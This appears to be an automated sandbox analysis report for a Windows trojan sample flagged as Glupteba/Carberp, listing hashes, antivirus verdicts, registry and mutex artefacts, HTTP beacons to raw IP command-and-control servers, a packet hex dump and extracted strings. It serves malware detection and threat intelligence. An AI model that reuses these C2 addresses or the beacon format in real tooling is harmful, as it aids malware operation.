Analysis Date2015-02-17 18:31:50
MD5112d65a0a3329e68de59585d76b91e6b
SHA1a00e9eec3f490aefdb73c2437cb96d6e47537f32

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 72abc5e8ade1fc1493e6b136b7206eac sha1: 29435c4604166f04209000fb1e8890fb9fa2a575 size: 94208
Section.rdata md5: d6fce82920219166345f37ce868e5600 sha1: 544a21f71134a7cbc86303d2803669ae55b3134c size: 20480
Section.data md5: ec2e85fe82cb231678e73f91896f5807 sha1: 3e542970618e117f4b86a31c100aa706d61783a7 size: 8192
Section.rsrc md5: ab5b1da4eb31ddd65d41de3c00442f68 sha1: d436f366b97d8cf7d5f52beda2d8baf70ae57cd4 size: 4096
Timestamp2015-02-02 13:06:27
PackerMicrosoft Visual C++ v6.0
PEhashd065e4ec770d848b4e6a651f3d06cace7214130f
IMPhash57493fa51f506cad60b9af073c41347b
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKD.2152730
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.GenericKD.2152730
AVAuthentiumW32/Trojan.WOHH-7581
AVAvira (antivir)TR/Glupteba.sjsdf
AVBullGuardTrojan.GenericKD.2152730
AVCA (E-Trust Ino)Win32/Carberp.DfWWIVB
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebError Scanning File
AVEmsisoftTrojan.GenericKD.2152730
AVEset (nod32)Win32/Glupteba.M
AVFortinetW32/Glupteba.M!tr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.GenericKD.2152730
AVGrisoft (avg)Generic36.ATLX
AVIkarusTrojan.Win32.Glupteba
AVK7Trojan ( 00286e241 )
AVKasperskyno_virus
AVMalwareBytesTrojan.Agent
AVMcafeeRDN/Generic.tfr!eh
AVMicrosoft Security EssentialsTrojan:Win32/Carberp.I
AVMicroWorld (escan)Trojan.GenericKD.2152730
AVRisingno_virus
AVSophosError Scanning File
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
15150124\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://63.251.156.211:24291/stat?uid=100&downlink=1111&uplink=1111&id=0001CC63&statpass=bpass&version=15150124&features=30&guid=330fe60c-40a1-4ae6-996d-5c60ee368360&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://223.202.33.211:11197/stat?uid=100&downlink=1111&uplink=1111&id=0001DFFB&statpass=bpass&version=15150124&features=30&guid=330fe60c-40a1-4ae6-996d-5c60ee368360&comment=15150124&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 95.131.139.225:26545
Flows TCP192.168.1.1:1031 ➝ 95.131.139.225:26545
Flows TCP192.168.1.1:1032 ➝ 63.251.156.211:24291
Flows TCP192.168.1.1:1033 ➝ 223.202.33.211:11197

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303143 43363326 73746174 70617373   001CC63&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d333330 66653630   =30&guid=330fe60
0x00000070 (00112)   632d3430 61312d34 6165362d 39393664   c-40a1-4ae6-996d
0x00000080 (00128)   2d356336 30656533 36383336 3026636f   -5c60ee368360&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 46464226 73746174 70617373   001DFFB&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d333330 66653630   =30&guid=330fe60
0x00000070 (00112)   632d3430 61312d34 6165362d 39393664   c-40a1-4ae6-996d
0x00000080 (00128)   2d356336 30656533 36383336 3026636f   -5c60ee368360&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..


Strings
.

9_!P
assisted
b5<\N
CompanyName
Discordia Limited
troubleshooting
VarFileInfo
VS_VERSION_INFO
W||_
wasteland
0-XXb(H
21%!?;7
22/1??
2{buji,T
2k?>F&r
(%->;3
3?q\kr
3xA}iBU
4^cvV8
6406  
:==>8<
]8p}dO
}?A${/
AbortSystemShutdownW
_acmdln
_adjust_fdiv
ADVAPI32.dll
B#_a*y
bI^pkrq
'bK&5k
BuildImpersonateExplicitAccessWithNameA
BuildSecurityDescriptorA
CE./^n
CheckRadioButton
ClearEventLogW
CLUSAPI.dll
ClusterRegCreateKey
COMCTL32.dll
_controlfp
ControlService
ConvertDefaultLocale
CopyBindInfo
c{qg`H
CreateAsyncBindCtxEx
CreateFileMappingA
CreateMenu
CreateMutexA
CreatePropertySheetPageW
CreateServiceA
Ct:aU)
d#&:;4
d7Mvxn4
@.data
DdeEnableCallback
DdeFreeStringHandle
DdeUnaccessData
DecryptFileA
DestroyCaret
DlgDirListComboBoxA
DragObject
dSNI]U
EnumCalendarInfoA
EnumDateFormatsA
EnumPropsExW
EnumServicesStatusW
EnumTimeFormatsA
_except_handler3
ExpandEnvironmentStringsW
  <!)F
fd#n\=
febsmihriokxslmrkm
FindFirstChangeNotificationA
FindFirstChangeNotificationW
FindMimeFromData
FlatSB_GetScrollPos
FormatMessageW
FreeLibrary
FreeSid
FtpRemoveDirectoryW
FtpRenameFileA
GetAclInformation
GetAsyncKeyState
GetClassInfoExA
GetClassURL
GetCommMask
GetConsoleCP
GetCurrencyFormatA
GetCurrentThread
GetDiskFreeSpaceExW
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentVariableW
GetFileAttributesA
GetFileInformationByHandle
GetFileSecurityA
GetLengthSid
__getmainargs
GetMenuItemCount
GetMenuState
GetMenuStringA
GetModuleHandleA
GetMultipleTrusteeA
GetMultipleTrusteeOperationA
GetNamedPipeHandleStateW
GetNumberFormatW
GetNumberOfEventLogRecords
GetParent
GetPrivateProfileIntA
GetProfileIntW
GetServiceKeyNameA
GetShortPathNameA
GetSidLengthRequired
GetStartupInfoA
GetStartupInfoW
GetSystemDefaultLCID
GetSystemMenu
GetTapeParameters
GetWindowContextHelpId
G_;h_R
GlobalReAlloc
GlobalSize
HlinkGoBack
HlinkSimpleNavigateToMoniker
h#wz(Hke
ImageList_DragEnter
ImageList_DragMove
ImageList_GetBkColor
ImageList_GetIconSize
ImageList_SetBkColor
ImageList_Write
ImpersonateNamedPipeClient
IMPQueryIMEA
IMPSetIMEA
_initterm
InsertMenuItemA
InternetConfirmZoneCrossing
IsCharLowerW
IsIconic
IsValidSecurityDescriptor
IsWindow
 j%,;[[
JI%xXX
[j}(K4t(i
.J>R0%g
	J T	0
jx,>%E
kagwexlkpqoiwuukpla
KERNEL32.dll
LoadKeyboardLayoutW
LogonUserW
LookupPrivilegeValueA
LookupPrivilegeValueW
lo@r'd4
LsaFreeMemory
LsaQueryDomainInformationPolicy
LsaRetrievePrivateData
LsaSetTrustedDomainInfoByName
 M}[3|
MakeSelfRelativeSD
MapDialogRect
MapGenericMask
MPR.dll
Msi.dll
MSVCRT.dll
Mvp`X+
NDdeApi.dll
ObjectDeleteAuditAlarmA
ObjectDeleteAuditAlarmW
ObjectOpenAuditAlarmA
ObjectPrivilegeAuditAlarmA
OpenBackupEventLogW
OpenDesktopA
OpenEventLogA
OpenProcessToken
OpenThreadToken
OsUg6Wt
PaintDesktop
__p__commode
Pde\Cp
PdhComputeCounterStatistics
PdhConnectMachineW
pdh.dll
PdhEnumMachinesA
PdhGetDefaultPerfCounterW
PdhGetFormattedCounterArrayW
PdhGetFormattedCounterValue
PdhLookupPerfNameByIndexW
__p__fmode
PrivilegedServiceAuditAlarmA
p$r,U1
QueryServiceConfig2W
QueryServiceConfigW
QueryServiceLockStatusA
QueryServiceStatus
RASAPI32.dll
RasGetEntryDialParamsA
RasGetEntryPropertiesW
RasGetErrorStringW
RasGetProjectionInfoW
RasRenameEntryW
RasSetEntryDialParamsW
`.rdata
ReadEventLogW
RegConnectRegistryA
RegCreateKeyExW
RegEnumKeyA
RegisterBindStatusCallback
RegisterClassExA
RegisterEventSourceW
RegisterFormatEnumerator
RegOpenKeyA
RegOpenKeyExW
RegRestoreKeyA
RegRestoreKeyW
RegSaveKeyA
RegSetKeySecurity
RegUnLoadKeyA
RevertToSelf
RevokeFormatEnumerator
SendMessageCallbackA
SendNotifyMessageA
SetAclInformation
__set_app_type
SetCaretPos
SetClusterNetworkName
SetEntriesInAclW
SetFileSecurityW
SetPropW
SetSecurityDescriptorSacl
SetTimer
SetupAdjustDiskSpaceListW
SETUPAPI.dll
SetupCopyErrorA
SetupCopyErrorW
SetupDecompressOrCopyFileA
SetupDefaultQueueCallbackA
SetupDeleteErrorA
SetupDiBuildClassInfoListExW
SetupDiClassNameFromGuidA
SetupDiDeleteDeviceInterfaceRegKey
SetupDiGetClassDescriptionW
SetupDiGetClassDevsExW
SetupDiGetClassInstallParamsW
SetupDiGetDeviceInstanceIdA
SetupDiGetDeviceRegistryPropertyA
SetupDiGetHwProfileFriendlyNameW
SetupDiInstallDevice
SetupDiSetDriverInstallParamsW
SetupFreeSourceListA
SetupGetLineCountA
SetupGetStringFieldW
SetupInstallFileExA
SetupInstallFromInfSectionW
SetupLogFileA
SetupQuerySpaceRequiredOnDriveW
SetupQueueCopyA
SetupRemoveFromDiskSpaceListW
SetupRemoveInstallSectionFromDiskSpaceListA
SetupTermDefaultQueueCallback
__setusermatherr
SetWinEventHook
StartServiceCtrlDispatcherA
S?ut8X
!This program cannot be run in DOS mode.
Tm5W46N
URLDownloadToCacheFileA
urlmon.dll
URLOpenStreamA
USER32.dll
WININET.dll
WNetCancelConnectionW
WNetCloseEnum
WNetDisconnectDialog1W
WNetGetNetworkInformationW
_XcptFilter
xe1]Sc
xepkfbiyglq